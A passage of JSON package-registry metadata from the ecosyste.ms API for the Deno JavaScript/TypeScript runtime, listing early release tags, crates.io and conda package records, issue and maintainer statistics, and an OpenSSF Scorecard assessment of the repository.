s.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:24:46.169Z","dependent_packages_count":0,"downloads":684237,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":47.41833843651933,"dependent_repos_count":26.487955639228183,"dependent_packages_count":35.131366740986806,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.34588693891144},"purl":"pkg:cargo/deno_package_json","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_package_json","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_package_json","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_package_json/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/codemeta","maintainers":[{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-08-06T09:07:24.262Z","updated_at":"2024-08-06T09:07:24.262Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5284169,"name":"deno","ecosystem":"conda","description":null,"homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":10,"first_release_published_at":"2021-12-22T02:02:08.000Z","latest_release_published_at":"2022-10-11T22:02:25.000Z","latest_release_number":"1.26.1","last_synced_at":"2026-04-17T13:04:16.571Z","created_at":"2022-10-03T15:40:36.942Z","updated_at":"2026-08-23T02:24:46.139Z","registry_url":"https://anaconda.org/conda-forge/deno","install_command":"conda install -c conda-forge deno","documentation_url":null,"metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: 